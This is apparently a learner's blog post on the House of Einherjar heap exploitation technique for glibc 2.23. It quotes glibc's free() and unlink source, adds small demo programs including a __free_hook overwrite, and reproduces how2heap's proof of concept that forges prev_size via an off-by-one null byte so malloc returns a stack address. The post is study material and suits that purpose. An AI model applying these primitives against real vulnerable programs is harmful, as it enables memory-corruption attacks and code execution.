  • On the 14th I had more or less worked through the House of Spirit heap technique, so now it is time to study House of Einherjar.
  • Before getting into House of Einherjar it is worth revisiting the unlink exploitation primitive first; that makes both the unlink procedure and the overall flow of free() much clearer.

Prerequisites

  • I studied the unlink technique a while ago but have not done any unlink-style challenges recently, so this post starts with a quick recap of the unlink procedure and of forward and backward chunk consolidation, with particular emphasis on the heap's implicit linked list (briefly mentioned in the House of Spirit write-up).

  • The free() and unlink source is reproduced again below; the plan is to read through it and sort out the flow of free(), which makes the House of Einherjar technique much easier to understand.

Flow of free()

  • Skimming the free() source gives a rough picture of its overall flow.

(The three flow-chart screenshots that illustrated this flow did not survive the export.)
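Since those screenshots are gone, here is a rough outline of the same flow, reconstructed from the glibc 2.23 source quoted later in this post; it is a summary sketch, not actual glibc code.

/* Rough outline of what free(mem) does in glibc 2.23, reconstructed from the
   __libc_free / _int_free source quoted below. Summary only; not real glibc code. */
void free_outline(void *mem)
{
    (void) mem;
    /* __libc_free:
         1. if __free_hook is set, call it and return immediately
         2. free(NULL) is a no-op
         3. p = mem2chunk(mem): step back from the user pointer to the chunk header
         4. if the chunk is mmapped, munmap_chunk(p) and return
         5. otherwise hand off to _int_free(arena, p, 0)

       _int_free:
         6. sanity checks: pointer does not wrap / is aligned, size >= MINSIZE and aligned
         7. if size <= max_fast: push the chunk onto the matching fastbin
            (the only double-free check is that the fastbin head is not already p)
         8. otherwise (and not mmapped):
            - validate the next chunk's size and prev_inuse bit
            - backward consolidation: if p's PREV_INUSE is clear, merge with the previous
              chunk (prev_size bytes back) and unlink it
            - forward consolidation: if the next chunk is free, unlink and merge with it
            - put the merged chunk on the unsorted bin, or fold it into top if it borders top
         9. if the freed size is large, consolidate fastbins and possibly trim top */
}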

The implicit linked list used by free()
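Physically adjacent chunks are chained only through their size and prev_size fields: the next chunk is at p + chunksize(p), and the previous chunk is at p - prev_size (the latter is only meaningful when the previous chunk is free). A minimal sketch of that layout follows; the struct mirrors glibc 2.23's malloc_chunk, but the demo itself is just an illustration.

#include <stdio.h>
#include <stdlib.h>

/* Same field order as glibc 2.23's struct malloc_chunk. */
struct malloc_chunk {
    size_t prev_size;                 /* size of the previous chunk, valid only if it is free */
    size_t size;                      /* this chunk's size; low 3 bits are flag bits */
    struct malloc_chunk *fd, *bk;     /* used only while the chunk sits in a bin */
    struct malloc_chunk *fd_nextsize, *bk_nextsize;
};

#define SIZE_BITS 0x7
#define chunksize(p)   ((p)->size & ~(size_t)SIZE_BITS)
#define mem2chunk(mem) ((struct malloc_chunk *)((char *)(mem) - 2 * sizeof(size_t)))

int main(void)
{
    void *a = malloc(0x38);           /* 0x40-byte chunk */
    void *b = malloc(0xf8);           /* 0x100-byte chunk, normally right after a */

    struct malloc_chunk *ca = mem2chunk(a);

    /* Forward step along the implicit list: next chunk = current + chunksize(current). */
    struct malloc_chunk *next = (struct malloc_chunk *)((char *)ca + chunksize(ca));

    printf("chunk of a : %p (size %#zx)\n", (void *)ca, chunksize(ca));
    printf("next chunk : %p\n", (void *)next);
    printf("chunk of b : %p\n", (void *)mem2chunk(b));   /* normally the same address */

    /* Backward step: prev = (struct malloc_chunk *)((char *)p - p->prev_size).
       House of Einherjar works by forging exactly this prev_size value. */
    free(b);
    free(a);
    return 0;
}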

free()-related source

__libc_free source

__libc_free
  • glibc 2.23, malloc.c, starting at line 2933
void
__libc_free (void *mem)
{
  mstate ar_ptr;
  mchunkptr p;                          /* chunk corresponding to mem */

  void (*hook) (void *, const void *)
    = atomic_forced_read (__free_hook);
  if (__builtin_expect (hook != NULL, 0))
    {
      (*hook)(mem, RETURN_ADDRESS (0));
      return;
    }

  if (mem == 0)                              /* free(0) has no effect */
    return;

  p = mem2chunk (mem);

  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
    {
      /* see if the dynamic brk/mmap threshold needs adjusting */
      if (!mp_.no_dyn_threshold
          && p->size > mp_.mmap_threshold
          && p->size <= DEFAULT_MMAP_THRESHOLD_MAX)
        {
          mp_.mmap_threshold = chunksize (p);
          mp_.trim_threshold = 2 * mp_.mmap_threshold;
          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
                      mp_.mmap_threshold, mp_.trim_threshold);
        }
      munmap_chunk (p);
      return;
    }

  ar_ptr = arena_for_chunk (p);
  _int_free (ar_ptr, p, 0);
}
libc_hidden_def (__libc_free)
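The very first thing __libc_free does is check __free_hook, which is why overwriting that pointer is such a common end goal in 2.23-era exploitation. A minimal, legitimate demonstration of the hook mechanism (this only works on glibc versions that still ship the malloc hooks, i.e. before 2.34):

#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>

/* Once __free_hook is non-NULL, __libc_free calls it and returns immediately. */
static void my_free_hook(void *mem, const void *caller)
{
    printf("free hook hit: mem=%p, caller=%p\n", mem, caller);
}

int main(void)
{
    void *p = malloc(0x20);

    __free_hook = my_free_hook;   /* in an exploit, this write is the corruption target */
    free(p);                      /* the hook runs; the chunk is NOT actually freed */
    __free_hook = NULL;

    free(p);                      /* now free() really runs */
    return 0;
}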

_int_free source

_int_free
  • glibc 2.23, malloc.c, starting at line 3836
/*
------------------------------ free ------------------------------
*/

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
INTERNAL_SIZE_T size; /* its size */
mfastbinptr *fb; /* associated fastbin */
mchunkptr nextchunk; /* next contiguous chunk */
INTERNAL_SIZE_T nextsize; /* its size */
int nextinuse; /* true if nextchunk is used */
INTERNAL_SIZE_T prevsize; /* size of previous contiguous chunk */
mchunkptr bck; /* misc temp for linking */
mchunkptr fwd; /* misc temp for linking */

const char *errstr = NULL;
int locked = 0;

size = chunksize (p);

/* Little security check which won't hurt performance: the
allocator never wrapps around at the end of the address space.
Therefore we can exclude some size values which might appear
here by accident or by "design" from some intruder. */
if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
|| __builtin_expect (misaligned_chunk (p), 0))
{
errstr = "free(): invalid pointer";
errout:
if (!have_lock && locked)
(void) mutex_unlock (&av->mutex);
malloc_printerr (check_action, errstr, chunk2mem (p), av);
return;
}
/* We know that each chunk is at least MINSIZE bytes in size or a
multiple of MALLOC_ALIGNMENT. */
if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
{
errstr = "free(): invalid size";
goto errout;
}

check_inuse_chunk(av, p);

/*
If eligible, place chunk on a fastbin so it can be found
and used quickly in malloc.
*/

if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())

#if TRIM_FASTBINS
/*
If TRIM_FASTBINS set, don't place chunks
bordering top into fastbins
*/
&& (chunk_at_offset(p, size) != av->top)
#endif
) {

if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (chunksize (chunk_at_offset (p, size))
>= av->system_mem, 0))
{
/* We might not have a lock at this point and concurrent modifications
of system_mem might have let to a false positive. Redo the test
after getting the lock. */
if (have_lock
|| ({ assert (locked == 0);
mutex_lock(&av->mutex);
locked = 1;
chunk_at_offset (p, size)->size <= 2 * SIZE_SZ
|| chunksize (chunk_at_offset (p, size)) >= av->system_mem;
}))
{
errstr = "free(): invalid next size (fast)";
goto errout;
}
if (! have_lock)
{
(void)mutex_unlock(&av->mutex);
locked = 0;
}
}

free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);

set_fastchunks(av);
unsigned int idx = fastbin_index(size);
fb = &fastbin (av, idx);

/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */
mchunkptr old = *fb, old2;
unsigned int old_idx = ~0u;
do
{
/* Check that the top of the bin is not the record we are going to add
(i.e., double free). */
if (__builtin_expect (old == p, 0))
{
errstr = "double free or corruption (fasttop)";
goto errout;
}
/* Check that size of fastbin chunk at the top is the same as
size of the chunk that we are adding. We can dereference OLD
only if we have the lock, otherwise it might have already been
deallocated. See use of OLD_IDX below for the actual check. */
if (have_lock && old != NULL)
old_idx = fastbin_index(chunksize(old));
p->fd = old2 = old;
}
while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);

if (have_lock && old != NULL && __builtin_expect (old_idx != idx, 0))
{
errstr = "invalid fastbin entry (free)";
goto errout;
}
}

/*
Consolidate other non-mmapped chunks as they arrive.
*/

else if (!chunk_is_mmapped(p)) {
if (! have_lock) {
(void)mutex_lock(&av->mutex);
locked = 1;
}

nextchunk = chunk_at_offset(p, size);

/* Lightweight tests: check whether the block is already the
top block. */
if (__glibc_unlikely (p == av->top))
{
errstr = "double free or corruption (top)";
goto errout;
}
/* Or whether the next chunk is beyond the boundaries of the arena. */
if (__builtin_expect (contiguous (av)
&& (char *) nextchunk
>= ((char *) av->top + chunksize(av->top)), 0))
{
errstr = "double free or corruption (out)";
goto errout;
}
/* Or whether the block is actually not marked used. */
if (__glibc_unlikely (!prev_inuse(nextchunk)))
{
errstr = "double free or corruption (!prev)";
goto errout;
}

nextsize = chunksize(nextchunk);
if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0)
|| __builtin_expect (nextsize >= av->system_mem, 0))
{
errstr = "free(): invalid next size (normal)";
goto errout;
}

free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);

/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(av, p, bck, fwd);
}

if (nextchunk != av->top) {
/* get and clear inuse bit */
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);

/* consolidate forward */
if (!nextinuse) {
unlink(av, nextchunk, bck, fwd);
size += nextsize;
} else
clear_inuse_bit_at_offset(nextchunk, 0);

/*
Place the chunk in unsorted chunk list. Chunks are
not placed into regular bins until after they have
been given one chance to be used in malloc.
*/

bck = unsorted_chunks(av);
fwd = bck->fd;
if (__glibc_unlikely (fwd->bk != bck))
{
errstr = "free(): corrupted unsorted chunks";
goto errout;
}
p->fd = fwd;
p->bk = bck;
if (!in_smallbin_range(size))
{
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}
bck->fd = p;
fwd->bk = p;

set_head(p, size | PREV_INUSE);
set_foot(p, size);

check_free_chunk(av, p);
}

/*
If the chunk borders the current high end of memory,
consolidate into top
*/

else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
check_chunk(av, p);
}

/*
If freeing a large space, consolidate possibly-surrounding
chunks. Then, if the total unused topmost memory exceeds trim
threshold, ask malloc_trim to reduce top.

Unless max_fast is 0, we don't know if there are fastbins
bordering top, so we cannot tell for sure whether threshold
has been reached unless fastbins are consolidated. But we
don't want to consolidate on each free. As a compromise,
consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
is reached.
*/

if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
if (have_fastchunks(av))
malloc_consolidate(av);

if (av == &main_arena) {
#ifndef MORECORE_CANNOT_TRIM
if ((unsigned long)(chunksize(av->top)) >=
(unsigned long)(mp_.trim_threshold))
systrim(mp_.top_pad, av);
#endif
} else {
/* Always try heap_trim(), even if the top chunk is not
large, because the corresponding heap might go away. */
heap_info *heap = heap_for_ptr(top(av));

assert(heap->ar_ptr == av);
heap_trim(heap, mp_.top_pad);
}
}

if (! have_lock) {
assert (locked);
(void)mutex_unlock(&av->mutex);
}
}
/*
If the chunk was allocated via mmap, release via munmap().
*/

else {
munmap_chunk (p);
}
}
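The "consolidate backward" branch above is the core of House of Einherjar: _int_free reads p->prev_size and simply subtracts it from p, with no check (in 2.23) that the result is a genuine chunk, so if both the PREV_INUSE bit and prev_size can be forged, the merged chunk can be made to start almost anywhere. A small sketch of just that pointer arithmetic; the function name and the addresses are made up for illustration.

#include <stdio.h>
#include <stdint.h>

/* Mirrors the backward-consolidation step of _int_free:
       prevsize = p->prev_size;
       p = chunk_at_offset(p, -((long) prevsize));
   With an attacker-controlled prev_size, the "previous chunk" can be anywhere. */
static void *consolidate_backward(void *chunk_b, size_t forged_prev_size)
{
    return (char *)chunk_b - forged_prev_size;
}

int main(void)
{
    /* Hypothetical addresses in the spirit of the how2heap PoC further down:
       a fake chunk on the stack and chunk b on the heap. */
    uintptr_t fake_chunk = 0x7ffc1234a010;
    uintptr_t chunk_b    = 0x0000555555757040;

    /* The attacker writes exactly this value into b's prev_size field. */
    size_t forged_prev_size = chunk_b - fake_chunk;

    void *merged = consolidate_backward((void *)chunk_b, forged_prev_size);
    printf("free(b) would consolidate into %p (the fake chunk)\n", merged);
    return 0;
}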

unlink source

unlink macro definition
  • glibc 2.23, malloc.c, starting at line 1413
#define unlink(AV, P, BK, FD) {                                            \
    FD = P->fd;                                                            \
    BK = P->bk;                                                            \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                  \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV); \
    else {                                                                 \
        FD->bk = BK;                                                       \
        BK->fd = FD;                                                       \
        if (!in_smallbin_range (P->size)                                   \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {             \
            if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)     \
                || __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \
              malloc_printerr (check_action,                               \
                               "corrupted double-linked list (not small)", \
                               P, AV);                                     \
            if (FD->fd_nextsize == NULL) {                                 \
                if (P->fd_nextsize == P)                                   \
                  FD->fd_nextsize = FD->bk_nextsize = FD;                  \
                else {                                                     \
                    FD->fd_nextsize = P->fd_nextsize;                      \
                    FD->bk_nextsize = P->bk_nextsize;                      \
                    P->fd_nextsize->bk_nextsize = FD;                      \
                    P->bk_nextsize->fd_nextsize = FD;                      \
                  }                                                        \
              } else {                                                     \
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;              \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;              \
              }                                                            \
          }                                                                \
      }                                                                    \
}
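Note the first check in the macro: FD->bk must equal P and BK->fd must equal P. The how2heap PoC below satisfies it simply by making the fake chunk's fd and bk point back at the fake chunk itself. A tiny stand-alone check of that logic (plain struct, illustration only):

#include <stdio.h>
#include <stddef.h>

struct fake_chunk {
    size_t prev_size, size;
    struct fake_chunk *fd, *bk;
    struct fake_chunk *fd_nextsize, *bk_nextsize;
};

int main(void)
{
    struct fake_chunk fake;

    /* Same trick as fake_chunk[2] / fake_chunk[3] in the PoC:
       both pointers point back at the fake chunk itself. */
    fake.fd = &fake;
    fake.bk = &fake;

    struct fake_chunk *P  = &fake;
    struct fake_chunk *FD = P->fd;     /* == &fake */
    struct fake_chunk *BK = P->bk;     /* == &fake */

    /* unlink's integrity check */
    if (FD->bk != P || BK->fd != P)
        puts("corrupted double-linked list");   /* never reached here */
    else
        puts("unlink check passed: FD->bk == P && BK->fd == P");

    /* The writes FD->bk = BK; BK->fd = FD; then just make the fake chunk
       point at itself again, so nothing is corrupted by the unlink itself. */
    return 0;
}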

Other source

Other source
  • glibc 2.23, malloc.c, line 1303: read a chunk's size, masking off the low flag bits
#define chunksize(p)         ((p)->size & ~(SIZE_BITS))
  • glibc 2.23, malloc.c, line 1219: steps the addr passed to free(addr) back to the start of the chunk header, rather than the user address that sits just past the size field.
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
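On 64-bit, SIZE_SZ is 8, so mem2chunk simply steps back 0x10 bytes from the user pointer, and chunksize clears the three flag bits (PREV_INUSE, IS_MMAPPED, NON_MAIN_ARENA). A quick sanity check of both ideas, with the macros re-defined locally for the demo:

#include <stdio.h>
#include <stdlib.h>

#define SIZE_SZ   (sizeof(size_t))            /* 8 on 64-bit */
#define SIZE_BITS 0x7                         /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
#define mem2chunk(mem)   ((char *)(mem) - 2 * SIZE_SZ)
#define chunksize(rawsz) ((rawsz) & ~(size_t)SIZE_BITS)

int main(void)
{
    void  *mem   = malloc(0xf8);                    /* user pointer returned by malloc */
    char  *chunk = mem2chunk(mem);                  /* chunk header = mem - 0x10 */
    size_t raw   = *(size_t *)(chunk + SIZE_SZ);    /* the size field, flags included */

    printf("mem       = %p\n", mem);
    printf("chunk     = %p\n", (void *)chunk);
    printf("raw size  = %#zx\n", raw);              /* typically 0x101: 0x100 | PREV_INUSE */
    printf("chunksize = %#zx\n", chunksize(raw));   /* 0x100 */

    free(mem);
    return 0;
}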

Experiment

  • This is the source of how2heap's house_of_einherjar.c (glibc 2.23 version).
Source
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

/*
Credit to st4g3r for publishing this technique
The House of Einherjar uses an off-by-one overflow with a null byte to control the pointers returned by malloc()
This technique may result in a more powerful primitive than the Poison Null Byte, but it has the additional requirement of a heap leak.
*/

int main()
{
setbuf(stdin, NULL);
setbuf(stdout, NULL);

printf("Welcome to House of Einherjar!\n");
printf("Tested in Ubuntu 16.04 64bit.\n");
printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

uint8_t* a;
uint8_t* b;
uint8_t* d;

printf("\nWe allocate 0x38 bytes for 'a'\n");
a = (uint8_t*) malloc(0x38);
printf("a: %p\n", a);

int real_a_size = malloc_usable_size(a);
printf("Since we want to overflow 'a', we need the 'real' size of 'a' after rounding: %#x\n", real_a_size);

// create a fake chunk
printf("\nWe create a fake chunk wherever we want, in this case we'll create the chunk on the stack\n");
printf("However, you can also create the chunk in the heap or the bss, as long as you know its address\n");
printf("We set our fwd and bck pointers to point at the fake_chunk in order to pass the unlink checks\n");
printf("(although we could do the unsafe unlink technique here in some scenarios)\n");

size_t fake_chunk[6];

fake_chunk[0] = 0x100; // prev_size is now used and must equal fake_chunk's size to pass P->bk->size == P->prev_size
fake_chunk[1] = 0x100; // size of the chunk just needs to be small enough to stay in the small bin
fake_chunk[2] = (size_t) fake_chunk; // fwd
fake_chunk[3] = (size_t) fake_chunk; // bck
fake_chunk[4] = (size_t) fake_chunk; //fwd_nextsize
fake_chunk[5] = (size_t) fake_chunk; //bck_nextsize


printf("Our fake chunk at %p looks like:\n", fake_chunk);
printf("prev_size (not used): %#lx\n", fake_chunk[0]);
printf("size: %#lx\n", fake_chunk[1]);
printf("fwd: %#lx\n", fake_chunk[2]);
printf("bck: %#lx\n", fake_chunk[3]);
printf("fwd_nextsize: %#lx\n", fake_chunk[4]);
printf("bck_nextsize: %#lx\n", fake_chunk[5]);

/* In this case it is easier if the chunk size attribute has a least significant byte with
* a value of 0x00. The least significant byte of this will be 0x00, because the size of
* the chunk includes the amount requested plus some amount required for the metadata. */
b = (uint8_t*) malloc(0xf8);
int real_b_size = malloc_usable_size(b);

printf("\nWe allocate 0xf8 bytes for 'b'.\n");
printf("b: %p\n", b);

uint64_t* b_size_ptr = (uint64_t*)(b - 8);
/* This technique works by overwriting the size metadata of an allocated chunk as well as the prev_inuse bit*/

printf("\nb.size: %#lx\n", *b_size_ptr);
printf("b.size is: (0x100) | prev_inuse = 0x101\n");
printf("We overflow 'a' with a single null byte into the metadata of 'b'\n");
a[real_a_size] = 0;
printf("b.size: %#lx\n", *b_size_ptr);
printf("This is easiest if b.size is a multiple of 0x100 so you "
"don't change the size of b, only its prev_inuse bit\n");
printf("If it had been modified, we would need a fake chunk inside "
"b where it will try to consolidate the next chunk\n");

// Write a fake prev_size to the end of a
printf("\nWe write a fake prev_size to the last %lu bytes of a so that "
"it will consolidate with our fake chunk\n", sizeof(size_t));
size_t fake_size = (size_t)((b-sizeof(size_t)*2) - (uint8_t*)fake_chunk);
printf("Our fake prev_size will be %p - %p = %#lx\n", b-sizeof(size_t)*2, fake_chunk, fake_size);
*(size_t*)&a[real_a_size-sizeof(size_t)] = fake_size;

//Change the fake chunk's size to reflect b's new prev_size
printf("\nModify fake chunk's size to reflect b's new prev_size\n");
fake_chunk[1] = fake_size;

// free b and it will consolidate with our fake chunk
printf("Now we free b and this will consolidate with our fake chunk since b prev_inuse is not set\n");
free(b);
printf("Our fake chunk size is now %#lx (b.size + fake_prev_size)\n", fake_chunk[1]);

//if we allocate another chunk before we free b we will need to
//do two things:
//1) We will need to adjust the size of our fake chunk so that
//fake_chunk + fake_chunk's size points to an area we control
//2) we will need to write the size of our fake chunk
//at the location we control.
//After doing these two things, when unlink gets called, our fake chunk will
//pass the size(P) == prev_size(next_chunk(P)) test.
//otherwise we need to make sure that our fake chunk is up against the
//wilderness

printf("\nNow we can call malloc() and it will begin in our fake chunk\n");
d = malloc(0x200);
printf("Next malloc(0x200) is at %p\n", d);
}
  • To make sure I actually read through this code instead of just skimming it, the key calculation of the PoC is worked through below.
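The one line that is easiest to gloss over is the fake prev_size computation. Here it is worked through with made-up but representative addresses (a real run prints the actual values):

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    /* Hypothetical addresses shaped like a real run of the PoC:
       fake_chunk lives on the stack, b on the heap. */
    uintptr_t fake_chunk = 0x7ffd4ce7b570;
    uintptr_t b          = 0x0000555555757050;   /* user pointer of b */
    uintptr_t b_chunk    = b - 0x10;             /* b's chunk header */

    /* fake_size = (b - 2*sizeof(size_t)) - fake_chunk, exactly as in the PoC. */
    size_t fake_size = b_chunk - fake_chunk;

    /* The PoC writes this value both into b's prev_size (through the end of a)
       and into fake_chunk[1], so that:
         1) the null-byte overflow clears b's PREV_INUSE bit;
         2) free(b) walks back prev_size bytes and lands exactly on fake_chunk;
         3) size(P) == prev_size(next_chunk(P)) holds, as the PoC comments note. */
    printf("fake prev_size      = %#zx\n", fake_size);
    printf("b_chunk - fake_size = %#lx  (== fake_chunk)\n",
           (unsigned long)(b_chunk - fake_size));
    return 0;
}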